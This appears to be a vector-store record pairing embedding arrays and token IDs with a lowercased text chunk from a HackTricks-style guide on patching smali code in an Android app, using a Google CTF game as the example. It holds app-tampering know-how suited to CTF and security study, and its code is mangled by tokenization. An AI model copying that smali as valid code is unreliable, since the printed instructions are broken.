0.0966939702630043, -0.7111327648162842, -0.15098343789577484, 0.41811439394950867, 0.26906877756118774, -0.18584363162517548, 0.7953966856002808, 0.03735006973147392, -0.5232018828392029, -0.01567181572318077, 0.6195425391197205, -0.12567535042762756, -1.452309489250183, -0.14970295131206512, -0.01579328253865242, -0.3378960192203522, -0.06591272354125977, 0.46570417284965515, 0.00023740749747958034, -0.7883686423301697, 0.3050830364227295, -0.4611037075519562, 0.15303094685077667, -0.6178702116012573, -0.23176807165145874, -0.5936985611915588, 0.23537154495716095, -1.3140147924423218, 0.6329326033592224, -0.9411118626594543, -0.21735146641731262, 0.3574424684047699, 0.7954312562942505, -0.009862923063337803, 0.11116904020309448, -0.5459852814674377, 0.5738430023193359, 0.44135358929634094, -0.3515366315841675, -0.6633540391921997, 0.6419426798820496, -0.2937156856060028, 0.28202271461486816, -0.43847015500068665, 0.17064590752124786, -0.6907130479812622, -0.39499348402023315, 0.654673159122467, -0.2836255133152008, 0.3942919373512268, -0.5798535346984863, -0.4504164159297943, -0.44356146454811096, 0.11701899021863937, 0.30131566524505615, -0.6619660258293152, 0.10406657308340073, -0.15307050943374634, -0.15980593860149384, -0.5061808228492737, 0.022679124027490616, -0.28357622027397156, -0.06468363106250763, 0.1444668024778366, 0.8495954275131226, 0.24085503816604614, -0.15038222074508667, -0.19663722813129425, -0.1736331433057785, 0.09633481502532959, 0.5113804936408997, -1.0531305074691772, -0.36789268255233765, 0.34193065762519836, -0.4369303584098816, 0.11932944506406784, 0.8793427348136902, -0.301727831363678, 0.30835607647895813, -0.1367746889591217, -0.15938429534435272, -0.021059002727270126, 0.2162276655435562, -0.30934014916419983, -0.6316502690315247, 1.0023083686828613, -0.43088099360466003, 0.1667270064353943, 0.02979639358818531, 0.9345724582672119, 0.5454208850860596, -0.1609090268611908, -0.40106314420700073, 0.17215244472026825, -0.9012277126312256, -1.0710923671722412, 0.44658997654914856, -0.25342461466789246, 0.22171862423419952, -0.06150425598025322, -0.3407891094684601, 0.6767327189445496, 0.17364312708377838, -0.2502136528491974, 0.7975894808769226, 0.16574274003505707, 0.36686256527900696, -0.7890177369117737, 0.44353774189949036, 0.3924643397331238, 0.1962166279554367, -0.013180872425436974, -0.41056135296821594, 0.3964584469795227, 0.24141806364059448, -0.14681726694107056, -0.28598880767822266, -0.4301888346672058, 0.2591797411441803, 0.35842621326446533, -0.17860223352909088, 0.2857239544391632, 0.03789281100034714, -0.8547650575637817, -0.23651957511901855, 0.26373082399368286, 0.029013201594352722, -0.6071758270263672, 0.7717803120613098, 0.7511566877365112, 0.413984090089798, -0.5881856679916382, 0.6312463879585266, -0.07720290124416351, 0.11344508081674576, 0.7694404721260071, -0.32605186104774475, -1.4117987155914307, 0.7636904120445251, 0.3600718080997467, -1.41718327999115, -0.17491693794727325, -0.003531844587996602, -0.5135709643363953, 0.04565437138080597, -0.021756915375590324, -0.2171640545129776, -0.46446385979652405, -0.15103961527347565, -0.026174278929829597, 0.48544493317604065, 0.04611201211810112, 0.20080484449863434, -0.5490308403968811, 0.39911341667175293, -0.03163726255297661, -0.03866831958293915, 0.5059207677841187, -0.423429012298584, -0.4006112813949585, -0.8133273124694824, 0.39247897267341614, -0.22462257742881775, 0.18698851764202118, 1.3407522439956665, 0.051074665039777756, 0.4591104984283447, 0.2896454930305481, 0.09260701388120651, 0.31574392318725586, -0.23398002982139587, 0.41600045561790466, 0.8123903870582581, -0.09684152901172638, -0.4957250654697418, -0.12988898158073425, 0.2456129640340805, -0.0536661259829998, 0.5615612268447876, -0.23754455149173737, -0.5652285814285278, -0.5754452347755432, -0.09412182122468948, -0.12316624820232391, -0.5472075939178467, -0.4492150545120239, -0.7784333825111389, -0.2037810981273651, 0.21803520619869232, -0.17096692323684692, 0.12782929837703705, 0.737156331539154, 0.8349980711936951, -0.41217464208602905, 0.40166914463043213, 0.723353385925293, -0.43036961555480957, -0.19965562224388123, -0.3850449025630951, -0.17323428392410278, -0.4455089867115021, -1.4150478839874268, -0.3465982973575592, -0.034854575991630554, -0.35272499918937683, -0.2606721818447113, -0.5967594981193542, 0.27022773027420044, -0.1323750764131546, 0.5662257671356201, -0.8894429802894592, -0.4937977194786072, -0.21996010839939117, -0.5371772050857544, 0.07244279980659485, 0.5830773115158081, 0.07295437902212143, 0.4939505159854889, -0.23799175024032593, 0.04831499233841896, -0.011287513189017773, -0.6444454789161682, -0.2152523696422577, -0.3464335799217224, 0.2610852122306824, -0.20995938777923584, -0.4329659938812256, -0.1824599951505661, 0.20692221820354462, -0.003982489462941885, 0.10016164928674698, -0.08680371940135956, -0.4465309977531433, -0.373782753944397, 0.47791731357574463, -0.11458934098482132, 0.09750448167324066, 1.2836183309555054, 0.1694967895746231, -0.06673944741487503, -0.7304099202156067, 0.6419292688369751, 0.15184807777404785, -0.25737977027893066, 0.12520062923431396, 0.7258933782577515, 0.1589386910200119, -0.9869376420974731, 0.15670384466648102, 0.4308885335922241, -0.20298010110855103, 0.8856039047241211, -0.18259386718273163, -0.3596673011779785, -0.3270007073879242, -0.7638372182846069, 0.617404580116272, 0.5075539946556091, 0.01963193342089653, -0.716688871383667, 0.5240989327430725, -0.017634565010666847, -0.09850767999887466, -0.011357742361724377, -0.882334291934967, -0.4860537350177765, -0.1463889181613922, -0.3918105959892273, -0.4267246425151825, -0.24006329476833344, -0.13200289011001587, -0.026888912543654442, 0.3592836260795593, -0.6478736996650696, 0.1184624582529068, -0.11489691585302353, 0.8452624082565308, 1.0549389123916626, -0.9779053926467896, -0.669428288936615, 0.1851399689912796, 0.40938910841941833, -0.7980755567550659, -0.9045110940933228, 0.6148632168769836, 0.5616904497146606, 0.13765139877796173, -0.26410993933677673, -0.45194387435913086, 0.3778091371059418, 0.55247563123703, 0.43245846033096313, -0.3328142762184143, 0.18348918855190277, -1.454477310180664, 0.5511236786842346, -0.6761938333511353, 0.03459962457418442, -0.010814406909048557, -0.2682201564311981, -0.1402662843465805, 0.240456685423851, -0.5245341062545776, 0.3215131163597107, 0.1036972850561142, -0.7012248635292053, 0.7632109522819519, -0.031801626086235046, 0.46320056915283203, -0.16958700120449066, -0.1572328358888626, -0.03881018981337547, 0.23602017760276794, 0.4404294192790985, 0.2721814215183258, 0.22570355236530304, 0.06979524344205856, 0.30870047211647034, -0.6286090612411499, -0.15519987046718597, 0.5125171542167664, 0.03035169094800949, -0.03143687546253204, -0.13826103508472443, 0.22537003457546234, 0.04037504270672798, -0.6687453389167786, -0.21938861906528473, 0.006561814807355404, 0.1861380636692047, -0.06630859524011612, 0.6515833139419556, -0.23978720605373383, 0.4549463093280792, -0.5924540758132935, 0.3708813786506653, 0.34536129236221313, -0.45474621653556824, 0.16449600458145142, -0.2954641282558441, -0.4003889858722687, -0.11722718179225922, 0.7765070796012878, -0.011015200987458229, 0.12606719136238098, 0.6793126463890076, -0.3087424337863922, 0.3517344892024994, 0.6171615123748779, -0.17908833920955658, -0.4713432192802429, -0.40177202224731445, 0.3468960225582123, -0.34340131282806396, -0.5533472895622253, 0.4805363714694977, 0.33765867352485657, -0.5217992067337036, 0.437255322933197, -0.244715616106987, -0.3039584755897522, -0.9033772945404053, 0.4485502541065216, -0.19958080351352692, 0.34706735610961914, 0.3938625752925873, -0.5517890453338623, -0.6306055784225464, 0.9089251160621643, 0.6547602415084839, 0.0632314458489418, -0.46291640400886536, 0.9901424646377563, 0.0676308423280716, 0.23115921020507812, 0.32685521245002747, -0.3960326910018921, -0.4375196397304535, -0.6832209825515747, -0.038697656244039536, -0.6598864793777466, -0.35095956921577454, -0.3027826249599457, 1.0859426259994507, -1.171992301940918, -0.7872044444084167, -0.37980014085769653, -0.1478155255317688, -0.48825231194496155, -0.6006312370300293, 0.1426459699869156, -0.056933872401714325, -0.345039039850235, -0.27248767018318176, -0.03552824631333351, 1.0234882831573486, 0.6194191575050354, -0.10786169767379761, -0.12033504992723465, -0.35077837109565735, -0.3198814392089844, -0.2209579199552536, 0.7036485075950623, -0.6395788192749023, -0.25452277064323425, 0.2645896375179291, -0.34571388363838196, -0.511695146560669, 0.09125292301177979, -0.381752073764801, -0.7701093554496765, 0.5320242047309875, 0.04183211550116539, 0.368684321641922, 0.6563206315040588, -0.580856204032898, -0.3128014802932739, -0.15897779166698456, 0.8414802551269531, 0.2548026442527771, 0.5172391533851624, 0.12950804829597473, 0.15178033709526062, 0.32745400071144104, -0.03035619482398033, 0.5913800597190857, -0.5132599472999573, 0.4371493458747864, -0.19963368773460388, 0.08917484432458878, -0.7029939889907837, -0.43094080686569214, 0.28927138447761536, -0.16075298190116882, -0.3031212389469147, 0.31284409761428833, -1.3259204626083374, 0.16725902259349823, -0.9853394031524658, -0.3158593475818634, -0.11152013391256332, 0.037022389471530914, 0.09412732720375061, -0.2576274275779724, 0.6272884607315063, -1.4950658082962036, 4.434043884277344, 0.5551285147666931, -0.4165124297142029, 0.5262491703033447, -0.16530127823352814, 0.813000500202179, 1.1308960914611816, -0.7187760472297668, 0.25307488441467285, -0.30978697538375854, -0.21678583323955536, -0.5995166301727295, 1.191986083984375, 0.47814056277275085, -0.14172665774822235, 0.6091660857200623, -0.3155187666416168, 0.02130485512316227, 0.35262539982795715, -1.1679240465164185, -1.2334436178207397, 0.8724389672279358, 0.16991159319877625, 0.5146205425262451, 0.272810697555542, 0.34426745772361755, -0.20624208450317383, -0.3760494291782379, -0.37755608558654785, -0.0065606096759438515, 0.3411642611026764, -0.0879870280623436, 0.23828154802322388, -0.24009571969509125, -0.2710232138633728, 0.2799057960510254, -0.046525564044713974, -0.5249588489532471, -0.4856196641921997, 0.36920008063316345, 0.7946009635925293, 0.11196468025445938, -0.24343246221542358, -0.6600612998008728, 0.7198294997215271, 0.6092143058776855, -0.6423608660697937, 0.1301165521144867, 0.2575477063655853, -1.0795929431915283, 0.46752285957336426, -0.1277478039264679, 0.30722564458847046, 0.06563784927129745, -0.6205587983131409, 0.15560954809188843, -0.19409121572971344, -0.3472762107849121, -0.020481649786233902, 0.4493703246116638, 0.5292405486106873, -0.6761907339096069, 0.04334016144275665, 0.03728161379694939, -1.2556943893432617, -0.34493979811668396, -0.3458597660064697, 0.08696518838405609, -0.236873060464859, -0.08580637723207474, -0.4196144938468933, -0.7043704390525818, -0.11839444190263748, -0.3286074995994568, 0.5925639867782593, -0.3347613215446472, -0.3643813133239746, -0.06725351512432098, 0.5504686236381531, -0.5594037771224976, 0.242866650223732, -0.09095383435487747, -0.7839280962944031, 0.05214182287454605, 0.7428191304206848, 0.5567129254341125, -0.16353102028369904, -0.5629384517669678, -0.00596745777875185, -0.03871573135256767, 0.42381417751312256, -0.010294145904481411, -0.8034065365791321, -0.3925546109676361, 0.15451247990131378 ]
[ 1011, 14593, 1028, 23569, 27605, 4371, 2047, 4646, 5831, 12952, 23773, 2003, 2019, 8756, 12139, 6994, 2008, 3640, 2590, 23569, 27605, 26652, 2000, 11924, 4646, 1006, 9706, 2243, 1007, 6764, 1012, 2062, 2592, 2182, 1012, 14101, 11475, 16206, 1031, 1011, 1042, 1033, 1031, 1011, 1058, 1033, 1026, 12139, 1028, 1999, 8873, 2571, 1012, 9706, 2243, 2041, 8873, 2571, 1012, 9706, 2243, 5831, 12952, 23773, 1011, 1058, 1018, 1999, 8873, 2571, 1012, 9706, 5705, 23773, 1996, 2047, 9706, 2243, 1006, 2153, 1029, 1007, 2065, 2017, 9544, 2000, 2224, 1031, 9706, 5705, 23773, 2121, 1033, 1006, 16770, 1024, 1013, 1013, 9722, 1012, 11924, 1012, 4012, 1013, 2996, 1013, 3094, 1011, 2240, 1013, 9706, 5705, 23773, 2121, 1007, 1008, 1008, 2612, 1997, 25067, 23773, 2121, 1010, 2017, 2323, 6170, 1996, 9706, 2243, 2044, 11243, 1996, 20600, 2007, 14101, 21682, 1008, 1008, 1012, 2021, 5060, 2008, 1008, 1008, 2017, 2069, 2031, 2000, 3696, 1996, 10439, 15472, 18963, 2320, 1008, 1008, 2007, 25067, 23773, 2121, 1006, 2077, 14101, 11475, 16206, 1007, 2030, 2007, 2004, 4523, 23773, 2121, 1006, 2044, 14101, 21682, 1007, 1012, 9706, 5705, 23773, 2121, 3696, 1011, 1011, 29535, 3145, 1012, 1046, 5705, 1012, 1013, 4487, 3367, 1013, 2026, 9006, 22090, 2094, 1012, 9706, 22287, 7716, 11787, 15488, 11475, 29278, 1996, 2206, 7592, 2088, 9262, 3642, 1024, 2270, 10763, 11675, 6140, 18223, 5004, 2953, 6392, 1006, 1007, 1063, 2291, 1012, 2041, 1012, 6140, 19666, 1006, 1000, 7592, 2088, 1000, 1007, 1065, 1996, 15488, 11475, 3642, 2052, 2022, 1024, 1012, 4118, 2270, 10763, 6140, 18223, 5004, 2953, 6392, 1006, 1007, 1058, 1012, 18687, 1016, 22214, 3388, 1011, 4874, 1058, 2692, 1010, 1048, 3900, 3567, 1013, 11374, 1013, 2291, 1025, 1011, 1028, 2041, 1024, 1048, 3900, 3567, 1013, 22834, 1013, 11204, 25379, 1025, 9530, 3367, 1011, 5164, 1058, 2487, 1010, 1000, 7592, 2088, 1000, 1999, 6767, 3489, 1011, 7484, 1063, 1058, 2692, 1010, 1058, 2487, 1065, 1010, 1048, 3900, 3567, 1013, 22834, 1013, 11204, 25379, 1025, 1011, 1028, 6140, 19666, 1006, 1048, 3900, 3567, 1013, 11374, 1013, 5164, 1025, 1007, 1058, 2709, 1011, 11675, 1012, 2203, 4118, 10760, 15488, 11475, 7899, 2275, 2003, 2800, 2182, 1012, 2422, 3431, 5302, 4305, 12031, 3988, 5300, 1997, 1037, 8023, 2503, 1037, 4972, 8462, 10857, 2024, 4225, 2012, 1996, 2927, 1997, 1996, 3853, 2478, 1996, 6728, 16044, 9530, 3367, 1010, 2017, 2064, 19933, 2049, 5300, 1010, 2030, 2017, 2064, 9375, 2047, 3924, 1024, 1001, 2193, 8663, 3367, 1058, 2683, 1010, 1014, 2595, 2546, 20958, 12740, 8663, 3367, 1013, 1018, 15754, 1010, 1014, 2595, 2487, 1001, 7817, 8663, 3367, 1011, 5164, 1058, 2629, 1010, 1000, 5222, 1000, 3937, 3136, 1001, 8785, 4215, 2094, 1011, 20014, 1013, 5507, 2620, 1058, 2692, 1010, 1058, 2475, 1010, 1014, 2595, 2487, 1001, 1058, 2475, 1009, 1014, 2595, 2487, 1998, 3828, 2009, 1999, 1058, 2692, 12274, 2140, 1011, 20014, 1058, 2692, 1010, 1058, 2475, 1010, 1014, 2595, 2475, 1001, 1058, 2475, 1008, 1014, 2595, 2475, 1998, 3828, 1999, 1058, 2692, 1001, 2693, 1996, 3643, 1997, 2028, 4874, 2046, 2178, 5302, 3726, 1058, 2487, 1010, 1058, 2475, 1001, 9530, 11927, 8496, 10128, 1011, 16216, 1001, 3618, 2030, 19635 ]
hack_tricks
424.txt
1
##if - le # less or equalsif - eq # equals # get / save attributes of an objectiget v0, p0, lcom / google / ctf / shallweplayagame / gameactivity ; - > o : i # save this. o inside v0iput v0, p0, lcom / google / ctf / shallweplayagame / gameactivity ; - > o : i # save v0 inside this. o # goto : goto _ 6 # declare this where you want to start a loopif - ne v0, v9, : goto _ 6 # if not equals, go to : : goto _ 6goto : goto _ 6 # always go to : : goto _ 6bigger changeslogging # log win : < number > iget v5, p0, lcom / google / ctf / shallweplayagame / gameactivity ; - > o : i # get this. o inside v5invoke - static { v5 }, ljava / lang / string ; - > valueof ( i ) ljava / lang / string ; # transform number to stringmove - result - object v1 # move to v1const - string v5, " wins " # save " win " inside v5invoke - static { v5, v1 }, landroid / util / log ; - > d ( ljava / lang / string ; ljava / lang / string ; ) i # logging " wins : < num > " recommendations : if you are going to use declared variables inside the function ( declared v0, v1, v2... ) put these lines between the. local < number > and the declarations of the variables ( const v0, 0x1 ) if you want to put the logging code in the middle of the code of a function : add 2 to the number of declared variables : ex : from. locals 10 to. locals 12the new variables should be the next numbers of the already declared variables ( in this example should be v10 and v11, remember that it starts in v0 ). change the code of the logging function and use v10 and v11 instead of v5 and v1. toastingremember to add 3 to the number of. locals at the beginning of the function. this code is prepared to be inserted in the middle
[ 0.312480628490448, -0.05259997770190239, 0.3953569531440735, -0.1602233499288559, -0.7877213954925537, -0.00337556772865355, 0.08928995579481125, 0.34947845339775085, 0.2180769294500351, 0.8529202342033386, 0.23145844042301178, -0.07548490911722183, 0.4118897020816803, -0.41386812925338745, -0.39805957674980164, -0.6048449873924255, -0.4901694357395172, 0.07680601626634598, -1.2350716590881348, -0.03359474614262581, 0.18338625133037567, 0.47489818930625916, -0.8209213614463806, -0.9381260275840759, -0.47416236996650696, 0.5305490493774414, 1.2704325914382935, 0.2911647856235504, 0.7542166113853455, 0.838481605052948, 0.4490976929664612, -0.2292269766330719, -0.5175999402999878, -0.5465879440307617, 0.05856889486312866, -0.1881696581840515, 0.7639099359512329, -0.5596791505813599, 0.3405686914920807, -0.7108204364776611, 0.1871037781238556, -0.8403881192207336, 0.22940388321876526, -0.7700341939926147, 0.10803719609975815, -0.19971637427806854, 0.4049650728702545, -0.1609191596508026, 0.7016870975494385, -0.7899652719497681, 0.27809926867485046, 0.020496804267168045, -0.046785175800323486, 0.32252681255340576, 0.11753712594509125, 0.09852740168571472, -0.017122957855463028, -0.1803416907787323, -0.26154741644859314, 0.7870559096336365, 0.13275524973869324, 0.02922394685447216, 0.5997392535209656, -1.1607614755630493, -0.49378225207328796, 0.17304275929927826, 0.4241020977497101, -0.1848604679107666, 0.15115034580230713, -0.6329916715621948, -0.29040005803108215, 0.33442792296409607, -0.7839972972869873, -0.19757160544395447, -0.9107196927070618, -0.003665298456326127, 0.09331342577934265, 0.0686088502407074, -0.2410602569580078, 0.5468195676803589, -0.050438474863767624, 0.29337117075920105, 0.22918765246868134, 0.0298859104514122, -0.02176136150956154, -0.2648393213748932, 0.21899296343326569, 0.7101737856864929, -0.13078798353672028, 0.08115198463201523, 0.30155524611473083, 0.30961769819259644, -0.22119411826133728, -0.4034215807914734, 0.5791096091270447, 0.6522592306137085, 0.08121966570615768, 0.006805905140936375, 0.2950228750705719, -0.6131637692451477, 0.9150316715240479, 0.8168540596961975, 0.5043759346008301, 0.7922597527503967, -0.5399607419967651, 0.1725197285413742, -0.5165741443634033, 0.015578513033688068, 0.26751357316970825, -0.17910988628864288, 0.21545398235321045, -0.11413192003965378, 0.7748544812202454, -0.085016168653965, -0.3476009964942932, 0.802899956703186, 0.13206854462623596, 0.1327276974916458, -0.21651357412338257, 0.9568324685096741, -0.3548327088356018, -0.14397157728672028, 0.3275812864303589, 0.5895470976829529, 0.1919873207807541, 0.05549805983901024, 0.2903307378292084, 0.5277605652809143, -0.7206090688705444, -0.5011730194091797, -0.054337210953235626, -0.40451815724372864, 0.08500625193119049, 0.18253563344478607, 0.20267081260681152, 0.7483714818954468, -0.31524932384490967, 0.46934789419174194, 0.7808395624160767, -0.8502782583236694, 0.6121581792831421, 0.45752787590026855, 0.01355145312845707, 1.2487136125564575, 0.08434263616800308, -0.07025720924139023, -0.08650341629981995, 0.23491457104682922, -0.5978580713272095, 0.07311529666185379, -0.5287628173828125, -0.24911503493785858, 0.5751729607582092, -0.5214625597000122, -0.7589762806892395, 0.7490829229354858, 0.10324940085411072, 0.031131422147154808, -0.516773521900177, 0.10030833631753922, 0.06034637242555618, 0.668753445148468, 0.0819791704416275, 0.2377476841211319, -0.9475393891334534, 0.6203445196151733, -0.5844116806983948, -0.25513750314712524, -0.23355281352996826, 0.17849192023277283, 0.2991562485694885, 0.2771559953689575, -0.3231234848499298, 0.040497396141290665, 1.593330979347229, 1.0368820428848267, -0.0016419929452240467, -0.06985894590616226, 0.14864496886730194, 0.8349500298500061, -1.1841048002243042, 0.10273398458957672, 0.2868494391441345, 0.19748888909816742, -0.014712251722812653, 0.38525792956352234, -0.5352535843849182, -0.34832242131233215, -0.41915178298950195, -0.13240067660808563, -0.19144457578659058, 0.522153377532959, -0.21976415812969208, 0.5869489908218384, 0.5672562122344971, 0.472949743270874, -0.7076135873794556, 0.19244685769081116, -0.565947413444519, -1.4886213541030884, -0.6858287453651428, 0.47613799571990967, 0.00480989646166563, 0.3932206332683563, -0.7480717301368713, -0.47380349040031433, 0.32898154854774475, 0.9720470905303955, -0.4537530839443207, 0.7652050852775574, 0.6886855363845825, 0.15320254862308502, -0.6553637385368347, 0.2963298261165619, 0.5050122737884521, 0.2003256231546402, -0.7854434847831726, 1.1637343168258667, -0.6038448810577393, -0.20316405594348907, 0.6127119064331055, 0.9179357886314392, 0.7628212571144104, 0.4290318787097931, 0.5075088739395142, -0.26871004700660706, 0.18972936272621155, 0.5410609245300293, -0.45967403054237366, 0.1262185126543045, -0.366504430770874, 0.7115378379821777, -0.04745233803987503, 0.6886619329452515, 0.3773680627346039, -0.19569890201091766, 0.43096864223480225, 0.4894699156284332, 0.031211957335472107, -0.0552452951669693, -0.19873911142349243, 0.6773408651351929, 0.6026784181594849, 0.445783793926239, 0.4573875963687897, 0.9943186640739441, 0.3376433551311493, 0.012500051409006119, 0.15829449892044067, 0.4931941628456116, 0.27771371603012085, 0.8629435300827026, 0.5903158187866211, -0.0994517058134079, -0.5618677139282227, -0.7895328998565674, 0.5556491017341614, 0.7541390061378479, -0.291000097990036, -1.1726264953613281, -0.25894874334335327, 0.21874894201755524, -0.17808915674686432, -0.5499663352966309, 0.23509624600410461, -0.03911738470196724, -0.5978633165359497, 0.49197152256965637, -0.007077543530613184, -1.2519396543502808, -0.9457966685295105, -0.3886975049972534, -0.9460647702217102, -0.22642315924167633, -0.7015718817710876, -0.6113593578338623, 0.6139926910400391, -0.4215560853481293, 0.5589796900749207, 0.07980377972126007, -1.2812702655792236, 0.19165687263011932, -0.244690403342247, 0.9950206279754639, 0.2618766129016876, -0.3794032037258148, -0.4985877275466919, -0.03175216540694237, 0.055537138134241104, 0.8972086906433105, -0.04458462446928024, -0.4604513347148895, -0.4459194540977478, 0.07615017145872116, -0.0021530436351895332, 0.5660444498062134, 0.9701253175735474, 0.20914630591869354, -0.42066705226898193, -1.0787190198898315, -0.24183128774166107, 0.24725721776485443, 0.056668709963560104, -0.08182203769683838, -0.37169432640075684, 0.7072079181671143, -0.9586021900177002, -0.9283422827720642, 0.4666326344013214, 0.6530761122703552, -0.5603933334350586, 0.018807681277394295, -0.01643751561641693, 1.0297024250030518, -0.6296346783638, 0.29571691155433655, 0.016209827736020088, 0.4591529667377472, -0.2860322594642639, 0.053394921123981476, -0.14754970371723175, -0.38971707224845886, 0.09593483805656433, -0.6910583972930908, -0.52657550573349, 0.7157853841781616, 0.37018877267837524, -0.7523258924484253, 0.5722497701644897, -0.05416255444288254, -0.398110955953598, -0.1866627335548401, -0.6013180613517761, 0.9561683535575867, -0.06370655447244644, -0.17500852048397064, 0.42469191551208496, -0.2781590223312378, 0.015252452343702316, 0.08141663670539856, 0.22704806923866272, -1.2163082361221313, 0.3263522684574127, 0.6008470058441162, 0.13469521701335907, 0.5960010290145874, -0.06677569448947906, -0.1371457874774933, -0.2080371230840683, 0.10308144986629486, 0.12835361063480377, 0.36075666546821594, 0.2746283710002899, 0.5269573330879211, -0.6577683091163635, 0.4957050681114197, -0.007145182695239782, 0.09289992600679398, -0.050401635468006134, -0.4893335998058319, 0.6689831614494324, 0.2542164921760559, -0.21709313988685608, 0.3607631027698517, -0.38537123799324036, -0.5345363020896912, -0.3175119161605835, -0.007331543602049351, 0.38873934745788574, -0.3533927798271179, 1.193381428718567, -0.2621310353279114, 0.09392312169075012, 0.5333487391471863, -0.25010839104652405, -0.41360679268836975, 0.7623538374900818, 0.35364410281181335, 0.6560234427452087, -0.5327833890914917, -0.19812466204166412, -0.1834987848997116, -0.47276294231414795, 0.1860700398683548, 0.0050543914549052715, 0.36726051568984985, -0.02537732571363449, -0.7470507025718689, -0.4510193467140198, -0.7687392234802246, 0.2730800211429596, -0.08565925061702728, -0.06630198657512665, -0.8066317439079285, -0.5731786489486694, -0.2508455514907837, 0.5189391374588013, 0.031704381108284, 0.6468305587768555, -0.053719889372587204, -0.0016259902622550726, -0.4287480115890503, -0.28624996542930603, 0.7511869668960571, -0.6692159175872803, 0.5541122555732727, 0.01445303950458765, 0.39115554094314575, 0.009905755519866943, -0.15711601078510284, -0.39207640290260315, 0.05253605172038078, -0.2137763798236847, -0.37471628189086914, 0.4717042148113251, 0.1107538640499115, -0.17603373527526855, -0.40758898854255676, 0.001446372247301042, 0.07486046850681305, -0.6634786128997803, -0.13300198316574097, 0.08593779057264328, 0.931103527545929, -0.06686917692422867, -0.8788320422172546, -0.45994114875793457, -0.30603450536727905, -0.01650756411254406, 0.2176612764596939, 0.3914746940135956, -0.10392213612794876, -0.7309044003486633, -0.24801532924175262, -0.629045307636261, -0.2504028081893921, 0.5132315754890442, 0.8389847278594971, 0.28078651428222656, -1.186752200126648, 0.011403357610106468, 0.35901322960853577, -0.10532086342573166, -0.6093328595161438, -0.05466439947485924, 0.20446808636188507, 0.4547120928764343, 1.0819190740585327, -0.2820430099964142, -0.5603042244911194, 0.23339082300662994, -0.8700729608535767, 0.5025522112846375, -0.8280042409896851, -0.20805583894252777, 0.07878980785608292, -0.18325676023960114, -0.31907495856285095, 0.10230076313018799, -0.7699920535087585, -0.4736686944961548, 0.25057101249694824, 0.10302529484033585, 0.15352879464626312, -0.47695261240005493, 1.0224978923797607, -0.3405207693576813, -0.35095661878585815, 0.6774876117706299, -0.037725966423749924, -0.2130824476480484, 0.06833738833665848, -0.5054757595062256, -0.4927345812320709, 0.6947818398475647, -1.1212867498397827, 0.004410650115460157, -0.13001543283462524, 0.29802536964416504, 0.134878009557724, -0.1511269211769104, 0.03915313258767128, 0.3856605887413025, -0.05710857734084129, -0.6305515170097351, -0.48454391956329346, -0.13112302124500275, 0.7275972962379456, -0.2752779424190521, 0.14591118693351746, -0.4450265169143677, -0.09290162473917007, 0.05704287067055702, -0.7829993963241577, 0.09744299948215485, -0.12749405205249786, -0.2569083869457245, 0.15339083969593048, 0.07449926435947418, 0.3481454849243164, 0.040845759212970734, -0.12861450016498566, -0.6720644235610962, 0.20629814267158508, -0.49814754724502563, 0.08663085848093033, -1.011433720588684, -0.11367134004831314, -0.6055148839950562, -0.0350460410118103, -0.21477769315242767, 0.14901570975780487, 0.11879565566778183, -0.4091024696826935, -0.34363940358161926, 0.48866114020347595, 0.40476810932159424, -0.026593714952468872, -0.5665462613105774, 1.0109409093856812, -0.3016084134578705, -0.6914117336273193, 0.04947759211063385, 0.36443841457366943, -0.4430222511291504, 0.1309458315372467, -0.29922759532928467, 0.022163430228829384, -0.843927264213562, -1.2050750255584717, -0.11254693567752838, -0.1643693745136261, -0.08517347276210785, -0.5890499949455261, -0.15928763151168823, -0.15482085943222046, 0.028429022058844566, 0.08173076063394547, -0.874576210975647, -0.0774836465716362, -0.4332076907157898, 0.07425586134195328, 0.030409052968025208, -0.3321858048439026, -0.03106638416647911, -0.7165865898132324, -0.36241614818573, 0.7175516486167908, -0.39744293689727783, 0.30835792422294617, 0.002769897226244211, 0.06444738805294037, -0.17679458856582642, -0.24215832352638245, -0.22900231182575226, -0.4414718747138977, -0.4344390034675598, -0.0063242181204259396, -0.4272388815879822, 0.39747560024261475, 0.546230673789978, 0.373343825340271, -0.9432546496391296, 0.2612459361553192, -0.14613622426986694, 0.06516695022583008, -0.22433823347091675, -0.28644859790802, 0.7670651078224182, -0.549999475479126, -0.40752458572387695, -0.19039644300937653, 0.47422879934310913, 0.04525276646018028, -0.381758451461792, -0.5442026257514954, -0.26595985889434814, -0.3898947834968567, -1.1219830513000488, 0.20096902549266815, 0.4201779365539551, 0.09175913780927658, -0.4862956404685974, -0.12769079208374023, 0.8040215373039246, 0.0002149768843082711, 0.07251005619764328, 0.7711598873138428, 0.33909475803375244, 0.5069814920425415, -0.7549940943717957, 0.07456190139055252, 0.022892214357852936, -0.23145876824855804, 0.5623807907104492, 0.2450818568468094, -0.07244303077459335, 0.6413326263427734, 0.16788575053215027, -0.42474856972694397, -0.5866329073905945, -0.22745178639888763, 0.33958226442337036, 0.3557499349117279, 0.2933342456817627, -0.3559965193271637, -1.2690446376800537, 0.038801029324531555, 0.6091614365577698, 0.18117327988147736, -0.4144350290298462, 0.7803699374198914, 0.29334181547164917, 0.7100239396095276, 0.31247833371162415, 0.6629308462142944, -0.6465443968772888, -0.1066010519862175, 0.9428092837333679, -0.30248990654945374, -0.728227972984314, 0.9849593043327332, 0.5652561783790588, -0.8294556736946106, -0.364675372838974, -0.15711736679077148, -0.14474348723888397, -0.010646463371813297, 0.0788361057639122, -0.4305936098098755, 0.33821502327919006, 0.4558989405632019, -0.3450409471988678, 0.17752891778945923, 0.07856657356023788, -0.044339101761579514, -0.5782646536827087, 0.4737958610057831, -0.3076449930667877, 0.8275245428085327, 0.7846667766571045, -0.9625447392463684, -0.3200933635234833, -0.8095067143440247, -0.14066925644874573, 0.5487352013587952, -0.5314387083053589, 1.3510996103286743, -0.18682916462421417, 0.0719488263130188, -0.004333948716521263, 0.3314887285232544, 0.3538936972618103, -0.40463483333587646, -0.015461426228284836, 1.0029648542404175, 0.2789651155471802, -0.9834378361701965, -0.6317986249923706, 0.1730773150920868, 0.11171625554561615, 0.7658289670944214, 0.003432102035731077, -0.2680840790271759, 0.19684232771396637, 0.21860279142856598, -0.541935384273529, -0.6616066694259644, -1.1301956176757812, -0.801256000995636, -0.519363284111023, -0.1245051920413971, -0.4646912217140198, 0.017929092049598694, -0.13242019712924957, -0.327085018157959, -0.3308345675468445, -0.1403484046459198, 0.3079107105731964, 0.16690152883529663, 0.668472409248352, -0.4412265419960022, 0.1917467564344406, -0.7005961537361145, -0.03099813684821129, -0.114936463534832, -0.19871829450130463, -0.19798634946346283, 0.05092184990644455, -0.4006217122077942, 0.27334219217300415, -0.11978784948587418, 0.5150648355484009, -0.318033367395401, 